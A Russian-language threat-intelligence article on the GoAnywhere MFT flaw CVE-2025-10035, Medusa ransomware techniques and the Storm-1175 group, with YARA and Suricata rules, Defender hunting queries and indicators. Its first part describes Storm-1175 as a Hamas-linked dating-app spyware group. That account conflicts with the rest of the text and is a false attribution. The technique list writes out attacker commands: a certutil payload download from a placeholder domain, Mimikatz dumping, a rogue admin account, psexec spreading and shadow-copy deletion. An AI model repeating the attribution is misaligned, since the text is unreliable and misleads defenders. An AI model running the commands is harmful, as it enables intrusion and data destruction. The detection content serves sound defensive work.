CVE-2025-10035 — GoAnywhere MFT под атакой Medusa Ransomware

18 сентября 2025 года Fortra опубликовала уведомление о безопасности, описывающее критическую уязвимость десериализации в License Servlet GoAnywhere MFT, отмеченную как CVE-2025-10035 с оценкой CVSS 10.0. Уязвимость может позволить злоумышленнику с корректно подделанной подписью ответа лицензии десериализовать произвольный объект, контролируемый атакующим, что потенциально ведёт к инъекции команд и удалённому выполнению кода (RCE). Группа киберпреступников, которую Microsoft Threat Intelligence отслеживает как Storm-1175 и известную развёртыванием вымогателя Medusa и эксплуатацией публично доступных приложений для начального доступа, была замечена при эксплуатации этой уязвимости.

Давайте разберёмся, что это такое.

Часть 1 APT

APT группировка Strom-1175

Storm-1175 (также известная как APT-C-30, Evil Soul, Frozenlight) — это продвинутая группа киберпреступников, тесно связанная с палестинским исламистским движением ХАМАС. В отличие от многих APT-групп, которые часто ассоциируются с государственными структурами, Storm-1175 является ярким примером "хактивистской" группировки, чьи мотивы сочетают киберпреступность с идеологической и политической борьбой.

Группа была впервые задокументирована и названа исследователями из компании Check Point Software Technologies в 2023 году. Название "Storm-1175" следует номенклатуре Microsoft, где "Storm" обозначает группу, а число — ее уникальный идентификатор

1. Цели и Мотивация

Идеологическая и политическая борьба: Основная цель — нанесение ущерба государству Израиль, его гражданам, организациям и критически важной инфраструктуре. Действия группы напрямую связаны с реальными политическими и военными конфликтами.
Дестабилизация обстановки: Создание хаоса, паники и недоверия среди израильского населения.
Сбор разведданных: Кража личных данных, перехват коммуникаций для последующего использования в операциях ХАМАСа.
Финансовая поддержка: Проведение фишинговых атак для кражи финансовой информации и, возможно, вымогательства средств.
Информационная война: Распространение пропаганды, дезинформации и запугивающих сообщений.

2. Тактика, техники и процедуры (TTPs)

Storm-1175 использует широкий спектр техник, подробно описанных в матрице MITRE ATT&CK.

Фаза 1: Проникновение (Initial Access)

Основной и самый изощренный метод — целевой фишинг через поддельные приложения для знакомств.

Создание легенды: Злоумышленники создают фальшивые профили привлекательных женщин в популярных израильских приложениях для знакомств (таких как Tinder, Bumble) и мессенджерах (Telegram, WhatsApp). Профили тщательно проработаны, используют фотографии, взятые из социальных сетей (часто украденные), и ведут долгие беседы для установления доверия.
Социальная инженерия: В процессе общения жертве предлагают перейти на более "безопасную" или "удобную" платформу для обмена сообщениями или видео-звонками.
Поддельное приложение: Жертве отправляется ссылка на загрузку якобы защищенного мессенджера или приложения для видео-звонков (например, малварь маскировалась под приложения "Vidogram", "RocketChat", "SecureCall" или даже поддельные версии "Instagram").
Обход защиты: Эти поддельные приложения не находятся в официальных магазинах (Google Play, App Store). Жертву инструктируют, как отключить защиту своего Android-устройства ("Allow installation from unknown sources"), чтобы установить вредоносное APK-приложение.

Фаза 2: Выполнение (Execution)

После установки поддельное приложение запрашивает широкий набор разрешений, включая доступ к контактам, микрофону, камере, местоположению и SMS. Как только разрешения получены, вредоносный код активируется.

Фаза 3: Устойчивость (Persistence) и Уклонение (Defense Evasion)

Маскировка: Приложение маскируется под легитимный мессенджер, его иконка выглядит нормально, и оно даже может выполнять некоторые заявленные функции (например, отправлять сообщения), чтобы не вызывать подозрений.
Скрытие уведомлений: Малварь может скрывать свои уведомления от пользователя, чтобы оставаться незамеченной.
Запрос административных привилегий: На некоторых версиях Android она может запрашивать права администратора устройства, что делает ее удаление крайне сложным.

Фаза 4: Сбор данных (Collection) и Утечка (Exfiltration)

Вредоносное ПО действует как шпионский троян с широким функционалом:

Шпионаж через камеру и микрофон: Дистанционный захват фото, видео и аудиозаписей с устройства.
Перехват SMS и звонков: Чтение входящих сообщений (включая коды двухфакторной аутентификации 2FA), прослушивание звонков.
Кража контактов, местоположения, файлов.
Кража учетных данных: Перехват вводимых паролей через фишинговые окна, накладываемые поверх других приложений (техника "overlay attack").
Доступ к мессенджерам: Перехват сообщений из WhatsApp, Telegram и других приложений.
Удаленное управление: Злоумышленники могут удаленно управлять некоторыми функциями устройства.

Собранные данные тайно передаются на контролируемые злоумышленниками серверы, которые часто размещаются на взломанных легитимных сайтах.

3. Связь с ХАМАС и другими группами

Исследователи обнаружили прямые доказательства связи Storm-1175 с ХАМАС:

Пересечение инфраструктур: Серверы, используемые для командования и управления (C&C) малварью Storm-1175, также использовались для хостинга пропагандистских материалов и официальных сайтов ХАМАСа.
Временные корреляции: Пики кибератак Storm-1175 часто совпадали с эскалациями военного конфликта между Израилем и ХАМАСом.
Целеполагание: Фокус исключительно на Израиле и его интересах соответствует целям ХАМАСа.

Группа также демонстрирует TTP-пересечения с другими про-палестинскими группами, такими как APT-C-23 (также известная как Desert Falcons, Gaza Cybergang), что указывает на возможный обмен инструментами, инфраструктурой и тактиками внутри экосистемы про-палестинского хактивизма.

4. Эволюция и текущее состояние

Storm-1175 — это адаптивная группа. После публикации отчетов от Check Point и других компаний кибербезопасности они меняли свои тактики:

Смена легенд: Помимо приложений для знакомств, они начали маскировать свои фишинговые кампании под:
- Приложения для доставки еды.
- Приложения для отслеживания ракетных атак (сирены).
- Приложения для заказа такси.
- Поддельные сайты израильских СМИ и новостных порталов.
Улучшение обфускации кода: Чтобы избежать обнаружения антивирусами.
Расширение целевого спектра: Начали атаковать не только частных лиц, но и сотрудников компаний через корпоративные мессенджеры.

Strom-1175 представляет собой новую угрозу в ландшафте кибербезопасности, где границы между государственными APT-группами, киберпреступниками и идеологическими хактивистами размываются.

Часть 2 Medusa

Анализ программ-вымогателей Medusa и TTP

Первоначальный доступ (Initial Access)
T1190 – Exploit Public Facing Applications.
Акторы Medusa используют эксплуатацию уязвимостей публичных приложений для первоначального доступа. Наиболее часто задействуются уязвимости в продуктах ConnectWise ScreenConnect (CVE-2024-1709, CVSS 10.0) и Fortinet EMS (CVE-2023-48788, CVSS 9.8). Организациям рекомендуется своевременно устанавливать обновления безопасности для устранения данных рисков.

T1566 – Phishing.
Аффилированные с Medusa группы применяют фишинговые кампании с целью кражи учётных данных и доступа к системам жертвы. Для этого рассылаются письма с вредоносными вложениями или ссылками на сайты-ловушки, имитирующие легитимные ресурсы.

Исполнение (Execution)
T1059.001 – PowerShell.
Преступники запускают PowerShell-команды для исполнения вредоносных скриптов и закрепления в системе. Используется обфусцированный код, загружающий payload в память для обхода антивирусов.

T1059.003 – Windows Command Shell.
Командная оболочка применяется для выполнения команд, разведки сети и отключения защитных механизмов:
cmd.exe /c net share, sc query, schtasks.

T1047 – Windows Management Instrumentation (WMI).
WMI используется для сбора информации о системах, пользователях и конфигурациях сети.
Пример команд: wmic printer get caption,name,deviceid,drivername,portname, wmic printjob.

Закрепление (Persistence)
T1136.002 – Create Account.
Создаются новые учётные записи с административными правами для сохранения доступа:
net user /add default <password> /domain.

Уклонение от обнаружения (Defense Evasion)
T1070.003 – Clear Command History.
Удаление истории PowerShell для сокрытия следов:
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath.

T1027.013 – Encrypted/Encoded File.
Используется обфускация и кодирование скриптов для обхода сигнатурного анализа.

T1562.001 – Impair Defenses.
Изменяются правила брандмауэра для открытия RDP-доступа:
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow.

Разведка (Discovery)
T1046, T1016 – Network and System Discovery.
Применяются штатные средства Windows и сторонние сканеры (Advanced IP Scanner, SoftPerfect) для изучения сети. Команды: netstat -a, ipconfig /all.

T1135 – Network Share Discovery.
Определяются сетевые шары для распространения шифровальщика: net share.

T1082 – System Information Discovery.
Сбор информации о системе: systeminfo, driverquery, а также вывод переменных окружения (%COMPUTERNAME%, %USERNAME% и др.).

T1069.002 – Permission Groups Discovery.
Определение привилегированных групп в домене Active Directory:
net group "Domain Admins" /domain.

Доступ к учётным данным (Credential Access)
T1003.001 – OS Credential Dumping (LSASS).
Использование инструмента Mimikatz для извлечения паролей и хэшей NTLM:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit".

Боковое перемещение (Lateral Movement)
T1072 – Software Deployment Tools.
Применяются инструменты PDQ Deploy и BigFix для распространения шифровальщика.

T1021.001 – Remote Desktop Protocol.
Использование RDP-подключений с украденными учётными данными:
mstsc.exe /v:{hostname/ip} /u:{user} /p:{password}.

Экспиляция данных (Exfiltration)
T1567.002 – Exfiltration to Cloud Storage.
Для вывода данных применяется утилита rclone, которая передаёт информацию на C2-серверы Medusa.

Command and Control
T1071.001 – Web Protocols.
Передача данных между заражёнными узлами и C2-серверами осуществляется по HTTPS.

T1219 – Remote Access Software.
Для поддержания постоянного доступа злоумышленники используют легитимное ПО удалённого управления, например AnyDesk.

T1105 – Ingress Tool Transfer.
Передача инструментов и полезных нагрузок выполняется при помощи certutil, PowerShell и PsExec:
certutil -f urlcache https://<domain>/<file>.msi <localfile>.msi.

Воздействие (Impact)
T1486 – Data Encrypted for Impact.
Medusa шифрует файлы с использованием AES-256, добавляя расширение .medusa. Для этого используется процесс gaze.exe, распространяемый по сети с помощью PsExec:
psexec.exe -s \\{host} cmd /c "c:\gaze.exe".

T1490 – Inhibit System Recovery.
Удаляются теневые копии томов для исключения восстановления данных:
vssadmin delete shadows /all /quiet.

Поддержка и моделирование атак (Picus Security Validation Platform)
Платформа Picus предоставляет средства для моделирования атак Medusa и проверки эффективности защитных систем. В библиотеке угроз Picus представлены кампании:
– Medusa Ransomware Campaign (Windows Endpoint, ID 31340)
– Medusa Ransomware Download Threat (Network Infiltration, ID 72791)
– Medusa Ransomware Email Threat (Email Infiltration, ID 66692).

Сигнатуры для предотвращения атак Medusa
В библиотеке смягчений Picus представлены проверенные сигнатуры для NGFW и антивирусов:
– Check Point NGFW: Ransomware.Win32.Medusa.TC. (несколько ID, включая 0920BA626, 0B7282E76 и др.)
– Cisco FirePower: MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt
– Fortigate AV: W32/Filecoder.MEDU!tr.ransom, W32/Filecoder_Medusa.A!tr.ransom
– Palo Alto: Ransom/Win32.medusa.h, .i, .j, .g
– Trellix и Snort: сигнатуры PowerShell с обходом ExecutionPolicy.

yara

rule Medusa_PowerShell_B64_Gzip
{
    meta:
        author = "szybnev"
        description = "Detects PowerShell one-liner that decodes Base64 and uses GzipStream/StreamReader (typical Medusa loader pattern)"
        reference = "User-provided indicators"
        date = "2025-10-12"
        threat = "Medusa_Ransomware"
        confidence = "high"
    strings:
        $ps1 = /powershell\s+(-nop|-noni|-w)\b/i
        $from64 = "FromBase64String"
        $gzip = "GzipStream"
        $stream = "System.IO.StreamReader"
        $read = "ReadToEnd"
    condition:
        ( $ps1 and $from64 and $gzip and $stream and $read ) or
        3 of ($ps1, $from64, $gzip, $stream, $read)
}

rule Medusa_Powershell_ExecPolicy_Bypass
{
    meta:
        author = "szybnev"
        description = "Detects PowerShell ExecutionPolicy bypass / hidden / no-profile invocation"
        date = "2025-10-12"
    strings:
        $ep = /-ep\s+bypass/i
        $nop = /-nop\b/i
        $hidden = /-w\s+hidden/i
        $noni = /-noni\b/i
    condition:
        2 of ($ep, $nop, $hidden, $noni)
}

rule Medusa_Ransom_Extension_and_Encryptor
{
    meta:
        author = "szybnev"
        description = "Detect potential Medusa encryptor artifact names or ransom extension .medusa and process names like gaze.exe"
        date = "2025-10-12"
    strings:
        $ext = /\.medusa\b/i
        $gaze = "gaze.exe"
        $rfn = "ransom" nocase
    condition:
        $ext or $gaze or $rfn
}

rule Medusa_Certutil_Download
{
    meta:
        author = "szybnev"
        description = "Detect certutil download usages commonly used to fetch payloads"
        date = "2025-10-12"
    strings:
        $cert1 = "certutil -f urlcache" nocase
        $cert2 = "certutil -urlcache" nocase
        $msi = ".msi" ascii
        $dll = ".dll" ascii
    condition:
        $cert1 or $cert2
}

rule Medusa_Mimikatz_String
{
    meta:
        author = "szybnev"
        description = "Detect Mimikatz common command strings used for LSASS dumping"
        date = "2025-10-12"
    strings:
        $mk1 = "sekurlsa::logonpasswords" nocase
        $mk2 = "privilege::debug" nocase
    condition:
        $mk1 or $mk2
}

Suricata


1) Certutil download pattern (HTTP URI)
alert http any any -> any any (msg:"MEDUSA | certutil URLCache download detected in HTTP URI"; http.uri; content:"urlcache"; nocase; content:".msi"; nocase; sid:1000001; rev:1; classtype:trojan-activity; priority:1; reference:url,user-provided)
alert http any any -> any any (msg:"MEDUSA | certutil URLCache download detected (DLL)"; http.uri; content:"urlcache"; nocase; content:".dll"; nocase; sid:1000002; rev:1; classtype:trojan-activity; priority:1;)

2) PowerShell executionpolicy bypass in HTTP POST/URI/payload (commandline)
alert http any any -> any any (msg:"MEDUSA | PowerShell ExecutionPolicy Bypass string in HTTP payload"; content:"-ep bypass"; nocase; http.client_body; sid:1000010; rev:1; classtype:policy-violation; priority:2;)

3) PowerShell one-liner common fragments (in HTTP or generic TCP payload)
alert tcp any any -> any any (msg:"MEDUSA | PowerShell one-liner with FromBase64String and GzipStream detected"; content:"FromBase64String"; nocase; content:"GzipStream"; nocase; distance:0; within:200; sid:1000011; rev:1; classtype:trojan-activity; priority:1;)

4) psexec / gaze.exe spread attempt (SMB/NETBIOS/HTTP transfer)
alert tcp any any -> any any (msg:"MEDUSA | psexec command or gaze.exe reference in payload"; content:"gaze.exe"; nocase; sid:1000020; rev:1; classtype:trojan-activity; priority:1;)
alert tcp any any -> any any (msg:"MEDUSA | psexec usage detected"; content:"psexec.exe"; nocase; sid:1000021; rev:1; classtype:trojan-activity; priority:1;)

5) VSSAdmin delete shadows command in payload (attempt to remove recovery)
alert http any any -> any any (msg:"MEDUSA | vssadmin delete shadows command in HTTP payload"; content:"vssadmin delete shadows"; nocase; http.client_body; sid:1000030; rev:1; classtype:impact; priority:1;)

6) Mimikatz command indicators in payload (credential dumping)
alert tcp any any -> any any (msg:"MEDUSA | Possible Mimikatz strings in traffic (sekurlsa::logonpasswords)"; content:"sekurlsa::logonpasswords"; nocase; sid:1000040; rev:1; classtype:credential-theft; priority:1;)

7) Rclone exfiltration pattern (common rclone endpoints / command fragments)
alert http any any -> any any (msg:"MEDUSA | rclone-like exfiltration HTTP pattern detected"; http.uri; content:"rclone"; nocase; sid:1000050; rev:1; classtype:exfiltration; priority:2;)

8) AnyDesk or remote access tool indicator in HTTP/TLS SNI or payload
alert tls any any -> any any (msg:"MEDUSA | AnyDesk / remote access tool identifier in TLS SNI or HTTP Host"; tls.sni; content:"anydesk"; nocase; sid:1000060; rev:1; classtype:trojan-activity; priority:2;)
alert http any any -> any any (msg:"MEDUSA | AnyDesk string in HTTP host/header"; http.host; content:"anydesk"; nocase; sid:1000061; rev:1; classtype:trojan-activity; priority:2;)

9) Ransom file extension .medusa observed in HTTP filename/path
alert http any any -> any any (msg:"MEDUSA | Possible .medusa ransom extension in HTTP URI"; http.uri; content:".medusa"; nocase; sid:1000070; rev:1; classtype:trojan-activity; priority:1;)

 10) Generic detection of PowerShell commandline markers in SMB/SMB2/HTTP payloads
alert tcp any any -> any any (msg:"MEDUSA | PowerShell invocation detected in network payload"; content:"powershell"; nocase; pcre:"/powershell\s+[-].{0,40}bypass/i"; sid:1000080; rev:1; classtype:policy-violation; priority:2;)

Часть 3 Medusa — эксплуатация CVE-2025-10035 в GoAnywhere MFT и активность Storm-1175

Анализ уязвимости

Уязвимость CVE-2025-10035 — критический дефект десериализации, влияющий на License Servlet административной консоли GoAnywhere MFT в версиях до 7.8.3. Она позволяет атакующему обойти проверку подписи путём подделки ответа лицензии, что открывает возможность десериализации произвольных объектов, управляемых атакующим.

Успешная эксплуатация может привести к инъекции команд и потенциальному RCE на уязвимой системе. Публичные сообщения указывают, что для эксплуатации аутентификация не требуется, если атакующий способен сгенерировать или перехватить валидные ответы лицензии, что делает эту уязвимость особенно опасной для экземпляров, доступных из интернета.

Влияние CVE-2025-10035 усугубляется тем, что после успешной эксплуатации злоумышленники могут выполнять разведку системы и пользователей, поддерживать длительный доступ и развёртывать дополнительные инструменты для латерального перемещения и вредоносной деятельности. В публичных рекомендациях настоятельно советуют немедленно установить патчи, проверить механизмы проверки лицензий и внимательно мониторить подозрительную активность в средах GoAnywhere MFT для снижения рисков, связанных с этой уязвимостью.

Эксплуатация Storm-1175

Исследователи Microsoft Defender выявили активность эксплуатации в нескольких организациях, соответствующую тактикам, техникам и процедурам (TTPs), приписываемым Storm-1175. Соответствующая активность наблюдалась 11 сентября 2025 года.

Анализ TTP злоумышленников показывает многоступенчатую атаку. Для первоначального доступа акторы использовали нулевой-day дефект десериализации в GoAnywhere MFT. Для поддержания доступа они злоупотребляли инструментами удалённого мониторинга и управления (RMM), в частности SimpleHelp и MeshAgent, размещая бинарные файлы RMM непосредственно под процессом GoAnywhere MFT. Помимо этих RMM-пейлоадов наблюдалось создание .jsp файлов в директориях GoAnywhere MFT, часто одновременно с размещением RMM-инструментов.

Далее злоумышленники выполняли команды разведки пользователей и систем и разворачивали инструменты, такие как netscan, для картирования сети. Латеральное перемещение достигалось с помощью mstsc.exe, позволяющего распространяться по системам внутри скомпрометированной сети.

Для командования и управления (C2) акторы использовали RMM-инструменты для установления инфраструктуры C2 и даже настраивали Cloudflare-туннель для защищённой коммуникации C2. На стадии эксфильтрации был отмечен разворот и выполнение rclone в как минимум одной среде жертвы. В конечном итоге в одной из скомпрометированных сред был успешно развёрнут вымогатель Medusa.

Меры по снижению рисков и рекомендации по защите

Microsoft рекомендует следующие меры для сокращения воздействия этой угрозы:

Обновитесь до последней версии в соответствии с рекомендациями Fortra. Учтите, что обновление не устраняет уже совершённую эксплуатацию — может потребоваться проверка скомпрометированных систем.
Используйте продукты управления атаковой поверхностью предприятия, например Microsoft Defender External Attack Surface Management (Defender EASM), чтобы обнаруживать непатченные системы на периметре.
Проверьте настройки периметрового брандмауэра и прокси, чтобы серверы были ограничены в доступе в интернет для произвольных соединений (например, доступ к веб-страницам и загрузкам). Такие ограничения препятствуют загрузке вредоносных файлов и активности C2.
Включите EDR в блокирующий режим, чтобы Microsoft Defender for Endpoint мог блокировать вредоносные артефакты, даже когда другое антивирусное ПО не обнаруживает угрозу или Microsoft Defender Antivirus запущен в пассивном режиме. EDR в блокирующем режиме автоматически ремедирует обнаруженные артефакты после компрометации.
Включите автоматическую полнофункциональную режим расследования и ремедиации, чтобы Microsoft Defender for Endpoint мог немедленно реагировать на оповещения и решать инциденты, что значительно снижает объём оповещений.
Включите блокирующий режим в Microsoft Defender Antivirus или эквивалент в используемом антивирусе, чтобы покрыть быстро развивающиеся инструменты и приёмы атакующих. Облачные механизмы машинного обучения блокируют большинство новых и неизвестных вариантов.
Включите правила уменьшения атаковой поверхности (attack surface reduction rules) для предотвращения распространённых техник, используемых в атаках вымогателей:
- Блокировать выполнение исполняемых файлов, если они не соответствуют критериям распространённости, возраста или доверенных списков.
- Использовать расширенную защиту против программ-вымогателей.
- Блокировать создание веб-шеллов на серверах.

Наблюдаемая активность и соответствующие оповещения Defender

Ниже перечислены наблюдаемые действия по тактикам и соответствующее покрытие Microsoft Defender:

Initial access — эксплуатация GoAnywhere MFT через десериализацию в службе лицензирования

Microsoft Defender for Endpoint обнаруживает возможную эксплуатацию через оповещение: Possible exploitation of GoAnywhere MFT vulnerability
Microsoft Defender Experts for XDR могут уведомлять через: Possible exploitation of vulnerability in GoAnywhere Tomcat и Possible discovery activity following successful Tomcat vulnerability exploitation
MDVM отображает устройства, уязвимые для CVE-2025-10035.
Defender EASM может показывать Attack Surface Insights с названием: [Potential] CVE-2025-10035 – GoAnywhere MFT Command Injection via Deserialization in Licensing Service (метка Potential означает, что сервис запущен, но не подтверждает уязвимую версию — требуется проверка).

Persistence — развёртывание и злоупотребление RMM-инструментами; подозрительное создание .jsp файлов в директориях GoAnywhere MFT

Оповещения Defender for Endpoint: Uncommon remote access software, Remote access software, Suspicious file dropped and launched, Suspicious service launched, Suspicious account creation, User account created under suspicious circumstances, New local admin added using Net commands, New group added suspiciously, Suspicious Windows account manipulation, Ransomware-linked threat actor detected.

Discovery — команды разведки пользователей и систем; развертывание netscan

Оповещения Defender for Endpoint: Suspicious sequence of exploration activities, Anomalous account lookups, Suspicious Windows account manipulation.

Command and control — использование RMM-инструментов и настройка Cloudflare-туннеля для C2

Оповещения Defender for Endpoint: Uncommon remote access software, Remote access software.

Exfiltration — разворачивание и выполнение rclone

Оповещение Defender for Endpoint: Ransomware-linked threat actor detected.

Actions on objectives — развёртывание Medusa ransomware

Microsoft Defender Antivirus обнаруживает вымогатель следующим образом: Ransom:Win32/Medusa
Defender for Endpoint также генерирует оповещения: Ransomware-linked threat actor detected.

Запросы поиска и hunting-queries (пример для Microsoft Defender XDR)

Поиск уязвимых устройств

DeviceTvmSoftwareVulnerabilities | where CveId in ("CVE-2025-10035") | summarize by DeviceName, CveId

Возможная эксплуатация GoAnywhere MFT
Ищите подозрительные PowerShell-команды, характерные для эксплуатации GoAnywhere MFT. Эти команды также детектируются оповещением Possible exploitation of GoAnywhere MFT vulnerability.

DeviceProcessEvents | where InitiatingProcessFolderPath contains @"\GoAnywhere\" | where InitiatingProcessFileName contains "tomcat" | where InitiatingProcessCommandLine endswith "//RS//GoAnywhere" | where FileName == "powershell.exe" | where ProcessCommandLine has_any ("whoami", "systeminfo", "net user", "net group", "localgroup administrators", "nltest /trusted_domains", "dsquery", "samaccountname=", "query session", "adscredentials", "o365accountconfiguration", "Invoke-Expression", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex ", "iex(", "Invoke-WebRequest", "set-MpPreference", "add-MpPreference", "certutil", "bitsadmin")

Подозрительные cmd.exe команды после возможной эксплуатации GoAnywhere MFT
Эти паттерны также детектируются оповещением Possible exploitation of GoAnywhere MFT vulnerability.

DeviceProcessEvents | where InitiatingProcessFolderPath contains @"\GoAnywhere\" | where InitiatingProcessFileName contains "tomcat" | where InitiatingProcessCommandLine endswith "//RS//GoAnywhere" | where ProcessCommandLine !contains @"\GIT\" | where FileName == "cmd.exe" | where ProcessCommandLine has_any ("powershell.exe", "powershell ", "rundll32.exe", "rundll32 ", "bitsad

File IoCs (RMM инструменты в идентифицированной активности Storm-1175):

4106c35ff46bb6f2f4a42d63a2b8a619f1e1df72414122ddf6fd1b1a644b3220 (MeshAgent SHA-256)
c7e2632702d0e22598b90ea226d3cde4830455d9232bd8b33ebcb13827e99bc3 (SimpleHelp SHA-256)
cd5aa589873d777c6e919c4438afe8bceccad6bbe57739e2ccb70b39aee1e8b3 (SimpleHelp SHA-256)
5ba7de7d5115789b952d9b1c6cff440c9128f438de933ff9044a68fff8496d19 (SimpleHelp SHA-256)

Network IoCs (IPs, связанные с SimpleHelp):

31[.]220[.]45[.]120
45[.]11[.]183[.]123
213[.]183[.]63[.]41